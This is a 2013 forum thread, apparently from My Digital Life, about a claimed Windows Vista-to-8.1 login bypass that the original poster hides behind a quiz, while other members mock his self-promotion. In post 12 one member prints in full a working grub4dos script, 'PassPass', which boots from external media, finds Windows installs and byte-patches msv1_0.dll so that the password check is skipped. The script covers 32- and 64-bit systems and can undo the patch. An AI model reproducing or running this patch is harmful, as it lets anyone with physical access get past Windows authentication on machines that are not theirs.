Windows 6.0-8.1 Security Bug!

Discussion in 'Forum Games' started by Marcin-prv, Jun 2, 2013.

  1. Marcin-prv

    Marcin-prv MDL Novice

    Nov 15, 2012
    22
    4
    0
    #1 Marcin-prv, Jun 2, 2013
    Last edited by a moderator: Apr 20, 2017
  2. KNARZ

    KNARZ MDL Addicted

    Oct 9, 2012
    868
    451
    30
    :tea: based in the screenshot (and nothing else) it seems you rename cmd to osk and than use the on screen keyboard while login. very very old.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. Humphrey

    Humphrey MDL Expert

    Dec 13, 2011
    1,458
    981
    60
    At least the video was interesting.. :bangin:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. Garbellano

    Garbellano MDL Addicted

    Aug 13, 2012
    948
    246
    30
  5. Marcin-prv

    Marcin-prv MDL Novice

    Nov 15, 2012
    22
    4
    0
    #5 Marcin-prv, Jun 3, 2013
    Last edited: Jun 3, 2013
    (OP)
    I do not rename cmd or any other files :)
     
  6. alicepattinson

    alicepattinson MDL Member

    Jan 29, 2013
    177
    32
    10
    Why spam? Hmmmmm. I think not :)
     
  7. KNARZ

    KNARZ MDL Addicted

    Oct 9, 2012
    868
    451
    30
    Maybe it's indeed a find which is something different, but the whole way you present it is - and I don't want to be rude - awfully ridiculous.
    The domain, the videos... the 'top secret' presentation... seriously? It's all more about self-portrayal than anything else. I personaly don't like this kind of behavior.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. Humphrey

    Humphrey MDL Expert

    Dec 13, 2011
    1,458
    981
    60
    I believe he has come here
    made the correct amount of post
    to post links for the purpose of getting hits on his youtube video and website.

    And it not saying the "bug" doesn't matter but even if they did fix it there are several other methods of getting past the login screen when its passworded.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  9. Marcin-prv

    Marcin-prv MDL Novice

    Nov 15, 2012
    22
    4
    0
    I know this is going to sound ridiculous...
    No one has to play this game, but if you want to get my guide you will need to solve the quiz :icecream:
     
  10. Humphrey

    Humphrey MDL Expert

    Dec 13, 2011
    1,458
    981
    60
    I hope someone solves it and spreads it like wildfire. :coffee:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  11. BTOR

    BTOR MDL Addicted

    Nov 18, 2009
    575
    584
    30

    If i have not mistaken , is it not How to hack Windows 6.0-6.3 [ for NT 8.1 to come , will have to wait for years ]

    You do not have any pattern for us to follow, for instance take 3 -> 66 -> X -> Y , [ you should provide the X for anyone to take a guess ]

    The truth is, to solve your puzzle we must first find the question then the answer.

    and i would like to say the same May the brain be with you!
     
  12. HALIKUS

    HALIKUS MDL Addicted

    Jul 29, 2009
    527
    369
    30
    #12 HALIKUS, Jun 18, 2013
    Last edited by a moderator: Apr 20, 2017
    Meh, this is a website for sharing ideas, not hoarding them and doing shameless self promotion. I don't need your guide, if you want to get past the login, all you need is a 6 kb file and a little grub4dos knowledge :)

    Code:
    !BAT
    
    errorcheck off
    debug off
    insmod /%grub%/wenv > nul
    insmod %0 > nul
    
    
    :: Call the subroutine specified as first parameter of the script
    if "%1"=="findDLL" goto :findDLL
    if "%1"=="findWinVer" goto :findWinVer
    if "%1"=="isWinDir" goto :isWinDir
    if "%1"=="patchUnpatch" goto :patchUnpatch
    if "%1"=="patchDLL" goto :patchDLL
    if "%1"=="unPatchDLL" goto :unPatchDLL
    if "%1"=="help" goto :help
    
    
    set dll = /system32/msv1_0.dll
    set osDrv = (md)0x2000+1
    set patchDrv = (md)0x2300+1
    set devDrv = (md)0x2500+1
    set dirDrv = (md)0x5800+80
    echo -e \x0 > %osDrv%## Initialize mem drive
    
    
    :: Find Windows installations
    
    :: Attempt to auto-detect Windows installation
    if not "%1"=="" goto :forceDetect
    :: If debug is off, nothing is written to output
    :: If debug is on, output is too verbose
    :: So, set debug to normal and turn it off immediately after
    debug normal
    find --devices=h > %devDrv%
    debug off
    set /a skip = 0
    :autoLoop
    cat --locate=\x0a --number=1 --skip=%skip% %devDrv% || goto :displayMenu
    set /a length = %?% - %skip%
    cat --skip=%skip% --length=%length% %devDrv% | set dev =
    set /a skip = %length% + %skip% + 1
    call %0 findDLL %dev%
    goto :autoLoop
    
    
    :: Force detection of Windows installation
    :forceDetect
    /%grub%/wenv for /L %p in (0,1,%1) do for /L %q in (0,1,%2) do exec %0 findDLL %p %q## Iterate over HD partitions
    
    
    :displayMenu
    if "%os%"==""  echo No Windows installation found!&& pause && goto :EOF## Display Windows installations found
    echo -e \ntitle Back to Main Menu \nconfigfile /%grub%/menu.lst \nboot >> %osDrv%
    echo -e \x0 >> %osDrv%## EOF marker for configfile
    configfile %osDrv%
    goto :EOF
    
    
    :: =======================  SUBROUTINES  =======================
    
    
    :: Searches for msv1_0.dll, %1 = findDLL, %2 = Disk#, %3 = Partition#
    :findDLL
    set dllRoot = %2
    if not "%dllRoot:~0,1%"=="(" set dllRoot = (hd%2,%3)
    /%grub%/wenv dir %dllRoot%/ > %dirDrv%
    /%grub%/wenv for /f %i in ( %dirDrv% ) do exec %0 isWinDir %i
    goto :EOF
    
    
    :: Checks if the directory contains Windows installation, %1 = isWinDir, %2 = Directory
    :isWinDir
    set dllPath = %dllRoot%/%2%dll%
    cat --length=0 %dllPath% || goto :EOF## Don't proceed further for non-existent partitions
    :: Start forming menu items
    set grubMenu = \ntitle Windows
    :: Check for Windows version based on size of msv1_0.dll
    call %0 findWinVer %dllPath%
    set grubMenu = %grubMenu% %os% at %dllRoot% \ncall %0 patchUnpatch %dllRoot% %2 \npause \nboot
    echo -e %grubMenu% >> %osDrv%## Write configfile to mem drive
    goto :EOF
    
    
    :: Find version of Windows installed
    :: This batch should print the version of
    :: .dll's tested on 32-bit ONLY
    :: You must provide a fully qualified path as parameter.
    :: Example: (hd0,0)/Windows/System32/msv1_0.dll
    :: or a valid relative path from current ROOT:
    :: /Windows/System32/msv1_0.dll
    :findWinVer
    # String is "FileV" in Unicode
    set file=%~dpnx2
    set string=\x01\x00\x46\x00\x69\x00\x6C\x00\x65\x00\x56\x00
    set version=
    set char=
    
    cat --hex --locate=%string% %file% > nul
    set /a offbase = %?% + 27
    
    set /a counter=1
    :loop
    set /a figure=0
    set /a offset=%offbase%+%counter%
    cat --skip=%offset% --length=1 %file% | set char=
    
    :floop
    if "%char%"=="%figure%" set version=%version%%%char%
    set /a figure=%figure%+1
    if "%figure%"=="10" goto :fnext
    goto :floop
    
    :fnext
    if "%char%"=="." set version=%version%%%char%
    set /a counter=%counter%+1
    if "%counter%"=="30" goto :next
    goto :loop
    
    :next
    set majmin=%version:~0,3%
    set os=(Unknown)
    if "%majmin%"=="5.0" set os=2000
    if "%majmin%"=="5.1" set os=XP
    if "%majmin%"=="5.2" set os=XP 64-bit or Server 2003
    if "%majmin%"=="6.0" set os=Vista or Server 2008
    if "%majmin%"=="6.1" set os=7 or Server 2008 R2
    if "%majmin%"=="6.2" set os=8 or Server 2012
    goto :EOF
    
    
    :: Patch or Unpatch?
    :patchUnpatch
    echo -e title Patch \ncall %0 patchDLL %2 %3 \npause \nboot > %patchDrv%
    echo -e title UnPatch \ncall %0 unPatchDLL %2 %3 \npause \nboot >> %patchDrv%
    echo -e title Back to OS detection \nconfigfile %osDrv% \npause \nboot >> %patchDrv%
    echo -e \x0 >> %patchDrv%## EOF marker for configfile
    configfile %patchDrv%
    goto :EOF
    
    
    :: Patches DLL file, %1 = patchDLL, %2 = (hdX,Y), %3 = WinDir
    :patchDLL
    set dllPath = %2/%3%dll%
    cat --locate=\x33\xC0\x90 %dllPath% > nul
    if "%@retval%"=="1" goto :warnUser
    :: Check for 0x6486 to identify 64-bit PE
    cat --locate=\x64\x86 %dllPath% > nul
    if "%@retval%"=="1" goto :64BitPatch
    cat --hex --locate=\x83\xF8\x10 --replace=\x33\xC0\x90 %dllPath% > nul
    goto :patchMessage
    :64BitPatch
    cat --hex --locate=\x48\x3B\xC6\x0F\x85 --replace=\x33\xC0\x90\x0F\x85 %dllPath% > nul
    :patchMessage
    echo DLL patched
    goto :EOF
    :warnUser
    echo This DLL version is not compatible or has been already patched
    configfile %osDrv%
    goto :EOF
    
    
    :: Unpatches DLL file, %1 = patchDLL, %2 = (hdX,Y), %3 = WinDir
    :unPatchDLL
    set dllPath = %2/%3%dll%
    :: Check for 0x6486 to identify 64-bit PE
    cat --locate=\x64\x86 %dllPath% > nul
    if "%@retval%"=="1" goto :64BitUnpatch
    cat --hex --locate=\x33\xC0\x90 --replace=\x83\xF8\x10 %dllPath% > nul
    goto :unpatchMessage
    :64BitUnpatch
    cat --hex --locate=\x33\xC0\x90\x0F\x85 --replace=\x48\x3B\xC6\x0F\x85 %dllPath% > nul
    :unpatchMessage
    echo DLL unpatched
    goto :EOF
    
    
    :help
    echo -e \nPassPass v1.0 - Idea by jaclaz, Coded by Sherlock
    echo Released under the jaclaz's CAREWARE license
    echo -e \nUsage: PassPass.g4b <MaxDisk#> <MaxPartition#>\n
    echo By default, PassPass tries to autodetect Windows installations
    echo If autodetection fails, provide MaxDisk# and MaxPartition# 
    echo to forcedetect and guide the script manually 
    echo PassPass.g4b script and /%grub%/wenv binary need to be
    echo present on the root of the boot media.
    
    
     
  13. Tito

    Tito Super Mod / Adviser
    Staff Member

    Nov 30, 2009
    17,378
    15,029
    340
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  14. Bytebuster

    Bytebuster MDL Addicted

    Apr 30, 2013
    551
    203
    30
    'supposed to be a game' roflmao, I like your sense of humor. :D ...as Tito's brains compute very fast you should've excluded him from contesting, lol)